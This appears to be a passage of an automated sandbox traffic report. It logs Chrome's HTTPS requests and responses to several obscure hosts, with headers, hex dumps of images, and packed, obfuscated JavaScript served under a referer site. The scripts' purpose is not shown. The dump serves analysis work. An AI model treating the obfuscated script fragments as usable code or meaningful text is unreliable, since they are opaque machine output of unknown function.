                                                                                                                                                          2024-06-09 22:41:23 UTC12769INData Raw: 56 6b 50 79 19 f4 53 14 9a 68 2f 82 e0 e8 59 7c 0f 44 f1 6a c7 d7 b6 e2 91 4c 24 a0 0b ff 3e a1 66 eb d0 f0 52 24 fd 83 66 d9 34 65 3a cc 5b b2 04 ba 7b 7b a1 eb f4 69 0e 9d 92 a1 79 4f 06 4f ef 87 d5 68 00 4a c4 7d 6a c9 b8 ce b2 14 69 86 b7 d2 98 f3 4e e4 26 38 79 5d 99 1b bc 8a 3e a5 61 c3 cc b3 b2 21 49 8d d3 eb 09 c6 66 b1 22 b9 60 c5 ba ab ff 6d c1 da 75 25 51 b4 0d 7f ff 9d 52 6d 97 51 cd 6a d8 35 35 3b 98 94 72 0e 73 be 3d 34 d0 75 3c 36 d0 96 8b 45 c3 2a 21 a4 c7 3a 64 d2 10 13 ec 7f 7e 18 2d 1a 1b 6d 38 f9 31 97 29 b3 0b 98 88 a3 41 e1 c5 88 bb b1 2a 4e f5 a9 2d 0d 3e 95 46 37 69 d5 e3 c3 f3 b0 42 12 0b 53 ad 72 1c 83 b8 10 1d b4 34 c0 9b 6d 69 f8 ea 27 2e df 79 66 cf e6 db 4d f9 b4 a7 80 a1 99 b4 9c ac 42 86 39 f8 8b 83 68 93 49 37 36 ba 83 99
                                                                                                                                                          Data Ascii: VkPySh/Y|DjL$>fR$f4e:[{{iyOOhJ}jiN&8y]>a!If"`mu%QRmQj55;rs=4u<6E*!:d~-m81)A*N->F7iBSr4mi'.yfMB9hI76


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          664192.168.2.550450163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC369OUTGET /ocs/cc.png?1717972879159 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC418INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache4.l2hk3[5,0], cache7.l2sg3[38,0], ens-cache13.de5[203,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55ca117179728832977006e
                                                                                                                                                          2024-06-09 22:41:23 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          665192.168.2.55044454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC555OUTGET /pc/240516-03/static/js/t3685-otherConf-js.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC355INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645cb16-1e0"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:00:06 GMT
                                                                                                                                                          Content-Length: 480
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 9033101126787094236
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC480INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 54 67 46 59 42 64 41 47 67 47 38 41 4a 66 41 56 51 42 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 53 6b 41 54 67 45 70 79 41 49 68 5a 49 51 41 41 69 51 63 68 58 54 75 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 41 41 55 68 4b 43 43 43 45 63 41 6e 70 6b 48 69 41 2b 73 35 42 49 41 73 69 6e 30 73 41 4e 69 48 45 4b 41 44 63 6f 58 78 59 51 42 67 42 43 41 41 59 41 58 78 46 68 41 30 64 53 63 52 67 6f 49 58 30 41 4f 53 67 67 72 67 42 7a 4b 47 35 30 41 44 45 55 49 52 67 51 41 47 55 41 43 78 52 67 51 4e 5a 32 49 72 52 4d 4d 53 45 51 44 68 59 68 4e 42 6b 55 65 4d 54 39 5a 50 45 6f 43 47 73 30 66 57 51 47 74 6b 34
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjATgFYBdAGgG8AJfAVQBEAuAMwFc0YAXAS3UxFLSkATgEpyAIhZIQAAiQchXTuIDcAeTAArEJwB0AExBMuaEAAUhKCCCEcAnpkHiA+s5BIAsin0sANiHEKADcoXxYQBgBCAAYAXxFhA0dScRgoIX0AOSggrgBzKG50ADEUIRgQAGUACxRgQNZ2IrRMMSEQDhYhNBkUeMT9ZPEoCGs0fWQGtk4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          666192.168.2.55044654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC551OUTGET /pc/240516-03/static/js/t3685-index-js.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC359INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645cb15-2958"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:00:05 GMT
                                                                                                                                                          Content-Length: 10584
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 15402222935294271033
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC1107INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 54 67 44 59 42 64 41 47 67 47 38 41 69 41 64 67 43 45 41 6d 66 53 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 49 55 74 31 4a 51 41 6c 46 58 5a 49 51 41 41 69 54 63 41 54 72 78 36 55 41 33 41 48 6b 77 41 4b 78 41 38 41 64 41 42 4d 51 72 58 6d 68 41 41 46 42 53 67 67 67 46 33 41 4a 36 59 52 6c 41 50 6f 75 51 53 41 4c 49 6f 44 37 41 44 59 67 6c 42 51 41 62 6c 42 2b 37 43 44 4d 41 49 51 41 44 41 43 2b 59 71 4b 47 54 71 53 55 41 42 59 67 55 45 59 4b 51 52 78 63 66 41 49 53 43 69 44 63 37 41 70 6f 4d 6d 67 4a 53 51 59 70 6c 41 43 32 49 47 6a 73 75 5a 77 38 2f 47 69 59 52 53 56 6c 46 66 58 56 55 4d 6e 4f 66 69 67 41 35 71 59 41 79 69 57 74
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjATgDYBdAGgG8AiAdgCEAmfSgLgDMBXNGAFwEt1MIUt1JQAlFXZIQAAiTcATrx6UA3AHkwAKxA8AdABMQrXmhAAFBSgggF3AJ6YRlAPouQSALIoD7ADYglBQAblB+7CDMAIQADAC+YqKGTqSUABYgUEYKQRxcfAISCiDc7ApoMmgJSQYplAC2IGjsuZw8/GiYRSVlFfXVUMnOfigA5qYAyiWt
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 52 56 6c 43 41 4d 64 79 67 42 67 4c 6f 41 42 55 71 41 50 74 75 43 31 4c 5a 51 4b 33 72 5a 74 4c 6a 56 6a 63 36 61 78 6f 32 41 43 61 52 31 51 4f 6c 6c 43 6e 59 4e 46 33 44 57 4a 6f 30 33 59 41 44 61 61 41 4e 4a 47 67 43 61 70 6f 41 30 46 35 76 53 31 6e 30 62 56 74 5a 62 72 65 6f 58 70 39 74 57 41 59 67 32 44 45 50 6e 5a 64 4d 50 58 65 4e 4d 4b 78 68 4d 67 42 33 38 6f 41 73 4a 71 6f 2b 6a 79 31 72 56 6a 4c 6a 70 67 41 47 75 59 41 62 56 6e 32 73 62 45 7a 31 34 50 39 57 64 51 33 46 52 54 2b 6e 6a 59 41 39 4b 61 41 42 74 79 67 43 35 32 72 35 67 41 32 38 59 41 5a 4c 47 41 4b 62 57 67 41 6c 57 63 7a 48 32 73 39 39 6e 50 63 37 7a 73 59 75 4f 59 31 62 41 31 31 6f 4f 43 36 54 6f 74 6b 61 4a 6f 6d 6b 50 55 37 36 4f 59 74 4c 56 42 50 55 55 43 79 73 77 42 47 34 4b 51
                                                                                                                                                          Data Ascii: RVlCAMdygBgLoABUqAPtuC1LZQK3rZtLjVjc6axo2ACaR1QOllCnYNF3DWJo03YADaaANJGgCapoA0F5vS1n0bVtZbreoXp9tWAYg2DEPnZdMPXeNMKxhMgB38oAsJqo+jy1rVjLjpgAGuYAbVn2sbEz14P9WdQ3FRT+njYA9KaABtygC52r5gA28YAZLGAKbWgAlWczH2s99nPc7zsYuOY1bA11oOC6TotkaJomkPU76OYtLVBPUUCyswBG4KQ
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 41 49 42 61 67 41 33 7a 36 41 44 6f 53 6b 58 4f 51 6f 41 50 52 6d 33 70 6d 31 75 31 42 31 32 4a 6b 31 67 41 46 4c 47 38 6d 41 43 67 64 68 4e 59 58 49 41 41 67 42 61 31 67 41 75 33 36 43 4a 6f 32 41 41 47 38 74 53 61 48 49 41 4a 41 4a 52 31 4d 56 55 70 35 49 46 67 43 56 55 41 53 56 31 31 6d 73 5a 6c 46 6c 44 31 57 56 73 4b 4c 31 6c 4b 32 43 64 56 6e 31 4c 5a 49 45 76 79 67 41 54 4c 61 41 43 42 35 6f 41 4f 36 4b 61 79 67 41 4b 44 61 31 55 66 58 59 6d 41 42 75 69 6e 72 74 53 61 31 59 41 42 36 4b 56 32 2f 56 67 41 55 38 72 53 70 46 79 41 44 72 79 6b 68 5a 74 59 41 44 6d 71 57 31 32 4a 68 70 43 4a 46 56 31 4a 30 52 65 35 52 4e 67 41 44 6d 62 55 6b 63 61 41 43 62 66 70 74 59 41 47 52 36 67 41 70 75 61 41 44 67 36 59 41 44 30 6d 68 35 46 35 5a 41 43 67 30 56 36
                                                                                                                                                          Data Ascii: AIBagA3z6ADoSkXOQoAPRm3pm1u1B12Jk1gAFLG8mACgdhNYXIAAgBa1gAu36CJo2AAG8tSaHIAJAJR1MVUp5IFgCVUASV11msZlFlD1WVsKL1lK2CdVn1LZIEvygATLaACB5oAO6KaygAKDa1UfXYmABuinrtSa1YAB6KV2/VgAU8rSpFyADrykhZtYADmqW12JhpCJFV1J0Re5RNgADmbUkcaACbfptYAGR6gApuaADg6YAD0mh5F5ZACg0V6
                                                                                                                                                          2024-06-09 22:41:23 UTC1285INData Raw: 58 79 64 73 58 38 6c 6a 46 4c 4a 67 41 44 7a 30 76 34 67 41 47 65 56 2f 6b 55 55 73 69 66 51 4e 69 6b 55 42 34 70 50 6b 76 79 61 4d 42 69 42 42 39 4c 4a 67 41 52 64 74 41 41 7a 70 72 77 53 55 71 75 55 78 36 76 6c 4d 6e 72 65 54 45 70 79 36 45 71 5a 73 55 73 6b 68 6c 59 69 32 55 32 71 52 58 58 49 6d 39 78 4c 79 50 79 63 51 55 4d 6c 68 51 65 54 47 70 43 55 69 59 70 7a 51 43 6d 57 54 41 41 65 78 6d 41 42 65 7a 30 41 41 4f 73 59 41 46 39 46 48 6d 75 4a 50 6f 48 6f 49 34 70 54 55 38 61 53 56 4a 53 6e 7a 46 4b 41 67 41 4f 34 74 41 41 36 65 62 35 77 6e 45 57 75 5a 61 56 59 30 6a 70 72 53 43 70 47 30 37 59 68 4e 4c 4b 6b 37 54 5a 59 67 41 65 64 43 61 70 74 53 4e 69 65 64 4c 36 6d 58 53 78 70 31 30 31 71 64 4a 4d 6f 41 73 69 46 61 67 41 4a 73 55 32 53 70 30 6a 4f
                                                                                                                                                          Data Ascii: XydsX8ljFLJgADz0v4gAGeV/kUUsifQNikUB4pPkvyaMBiBB9LJgARdtAAzprwSUquUx6vlMnreTEpy6EqZsUskhlYi2U2qRXXIm9xLyPycQUMlhQeTGpCUiYpzQCmWTAAexmABez0AAOsYAF9FHmuJPoHoI4pTU8aSVJSnzFKAgAO4tAA6eb5wnEWuZaVY0jprSCpG07YhNLKk7TZYgAedCaptSNiedL6mXSxp101qdJMoAsiFagAJsU2Sp0jO


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          667192.168.2.55045290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC385OUTGET /pc/image-pc/index/382/footer/icon_service.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2136
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-858"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE6[3],EU-FRA-paris-GLOBAL1-CACHE25[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063147
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fb6935c26fb60722dbf009cee4a58500
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528853
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2136INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          668192.168.2.55044854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC561OUTGET /pc/240516-03/static/js/components/121/headerTip.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC357INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645ca5b-b44"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:59 GMT
                                                                                                                                                          Content-Length: 2884
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 17740367804310377715
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2884INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 5a 67 42 59 42 64 41 47 67 47 38 42 78 58 49 67 44 67 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 44 73 6b 41 45 6f 4b 41 58 7a 49 42 7a 41 4d 49 41 6c 41 49 72 4d 32 6e 48 6d 6a 34 43 79 58 59 51 43 49 57 53 45 41 41 49 6b 48 41 45 35 64 4f 6d 67 4e 77 42 35 4d 41 43 73 51 6e 41 48 51 41 54 45 45 79 35 6f 51 41 42 53 4d 6f 49 49 49 78 77 41 6e 70 67 67 5a 4a 6f 41 2b 75 45 67 53 41 43 79 4b 45 34 73 41 44 59 67 6d 70 51 41 62 6c 43 4a 4c 43 41 4d 41 49 51 41 44 43 4b 43 35 68 6c 47 42 67 43 38 58 4a 69 61 2b 54 41 51 54 4a 71 43 5a 47 6a 6c 46 47 68 51 41 4c 59 35 6d 74 77 51 53 41 41 79 58 49 61 70 54 6c 41 63 55 41 72 73 33 4c 7a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgZgBYBdAGgG8BxXIgDgC4AzAVzRgBcBLdTDskAEoKAXzIBzAMIAlAIrM2nHmj4CyXYQCIWSEAAIkHAE5dOmgNwB5MACsQnAHQATEEy5oQABSMoIIIxwAnpggZJoA+uEgSACyKE4sADYgmpQAblCJLCAMAIQADCKC5hlGBgC8XJia+TAQTJqCZGjlFGhQALY5mtwQSAAyXIapTlAcUArs3Lz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          669192.168.2.55044543.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:23 UTC368OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 11555915169680236411
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC1139INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:23 UTC4096INData Raw: 00 00 00 00 00 00 00 00 00 05 03 04 06 07 01 02 08 00 09 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 00 01 02 04 05 06 07 08 10 00 02 01 03 03 02 04 03 06 03 07 03 05 01 00 00 01 02 03 11 04 05 00 12 06 21 13 31 41 51 07 61 22 14 71 81 32 23 15 08 91 b1 16 a1 42 52 62 72 33 24 c1 d1 09 92 43 53 34 18 e1 11 00 01 03 02 04 03 06 03 06 05 03 04 03 01 00 00 01 00 11 02 03 04 21 31 12 05 41 51 06 61 71 81 22 32 13 91 a1 14 f0 b1 c1 42 52 62 d1 e1 23 33 07 72 82 b2 92 a2 c2 15 f1 e2 43 36 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 e7 a8 e0 90 f8 0a fd 87 5f 4f e4 be 77 d4 94 31 48 07 fb 4c 7e ed 48 10 52 74 3e 76 68 fa 88 d8 37 95 41 d1 61 10 54 4a 64 66 a1 fc d1 f3 1f 05 ff 00 be 88 69 be 2a 3a b8 04 d2 63 55 6a 9f 3d 02 68 91 c1 29 6e 45 46 86 ca 6a
                                                                                                                                                          Data Ascii: !1AQa"q2#BRbr3$CS4!1AQaq"2BRb#3rC6?_Ow1HL~HRt>vh7AaTJdfi*:cUj=h)nEFj
